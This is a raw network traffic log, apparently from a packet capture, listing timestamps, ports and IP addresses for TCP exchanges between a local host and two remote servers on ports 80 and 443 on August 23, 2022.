Aug 23, 2022 18:23:57.819854021 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.819880962 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.819936991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.819948912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.820004940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.820069075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.820084095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.820127010 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.820163012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.820184946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.820223093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.820240974 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.820241928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.820280075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.820288897 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.820329905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.820365906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.820420980 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.824657917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.824788094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.827759027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.827790022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.827812910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.827868938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.827897072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.828588009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.828614950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.828644991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.828669071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.828722954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.828814983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.828841925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.828869104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.828903913 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.828907013 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.828932047 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.828963995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.828974962 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.829102039 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.829128981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.829159975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.829179049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.829189062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.829215050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.829233885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.829261065 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.830318928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.830403090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.830415010 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.830463886 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.830487967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.830569983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.830574036 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.830576897 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.830599070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.830621004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.830642939 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.830677032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.830688953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.832195997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.832257986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.832285881 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.832315922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.832340956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.832344055 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.832381964 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.832397938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.832690001 CEST	49835	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:57.832751036 CEST	443	49835	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:57.832839012 CEST	49835	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:57.833744049 CEST	49835	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:57.833775043 CEST	443	49835	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:57.838080883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.838148117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.838215113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.838244915 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.839725018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.839801073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.840603113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.840631008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.840652943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.840679884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.840702057 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.841763020 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.841828108 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.841845989 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.841869116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.841893911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.841909885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.841918945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.841959953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.841972113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.842016935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.842066050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.842093945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.842116117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.842117071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.842139959 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.842159986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.842181921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.842183113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.842207909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.842216969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.842231035 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.842232943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.842257023 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.842282057 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.842632055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.842652082 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.842669964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.842706919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.842735052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.842900991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.842964888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.843004942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.843045950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.843053102 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.843070030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.843153954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.843192101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.843274117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.843919992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.843951941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.843971014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.843981981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.843986988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.843997955 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844003916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844018936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844021082 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844038010 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844046116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844074965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844126940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844173908 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844196081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844227076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844243050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844248056 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844276905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844278097 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844295025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844297886 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844311953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844341040 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844347000 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844363928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844381094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844392061 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844417095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844427109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844793081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844825983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844847918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844892979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844922066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844959021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.844979048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.844997883 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.845010042 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.845027924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.845056057 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.845065117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.845093966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.845119953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.845153093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.845179081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.845238924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.845346928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.845376968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.845396042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.845417976 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.846963882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.846996069 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.847024918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.847033978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.847059011 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.847064018 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.848805904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.848850012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.848880053 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.848929882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.848958969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.848988056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.849016905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.849183083 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.849273920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.849287033 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.849301100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.849378109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.849399090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.849416018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.849461079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.849474907 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.849488020 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.849509001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.849545956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.849561930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.849615097 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.851068020 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.851135015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853236914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853271008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853295088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853319883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853322983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853344917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853358984 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853369951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853406906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853426933 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853514910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853539944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853648901 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853657007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853676081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853694916 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853701115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853724003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853739977 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853759050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853801966 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853838921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853863955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853885889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853889942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853904963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853914022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853929996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853940964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853954077 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853965998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.853985071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.853991032 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.854008913 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.854017019 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.854029894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.854042053 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.854060888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.854063034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.854084015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.854120970 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.861325026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.861375093 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.861407042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.861435890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.861618996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.861650944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.861685991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.861701965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.863284111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.863331079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.863373995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.863398075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.863431931 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.863451958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.863461018 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.863559008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.863614082 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.863656998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.863682985 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.863702059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.863758087 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.863796949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.863821030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.863841057 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.863863945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.863874912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.863888025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.863904953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.863926888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.864914894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.864947081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.864973068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.864983082 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.864996910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.865017891 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.865041018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.865065098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.865113020 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.865125895 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.865128994 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.865133047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.865135908 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.865921021 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.865962029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.865973949 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.865986109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.865988016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.866022110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.866044998 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.870275021 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.870306015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.870337009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.870362997 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.872863054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.872934103 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.874528885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.874560118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.874620914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.874646902 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.875360012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.875389099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.875416040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.875452042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.875466108 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.875487089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.875494957 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.875524044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.875982046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876013041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876038074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876063108 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876066923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.876089096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876108885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.876116037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876141071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876167059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876198053 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.876204014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.876207113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.876211882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.876513004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876538992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876565933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876586914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.876621962 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876648903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.876725912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.876827002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876853943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876890898 CEST	49827	80	192.168.2.3	45.95.11.158
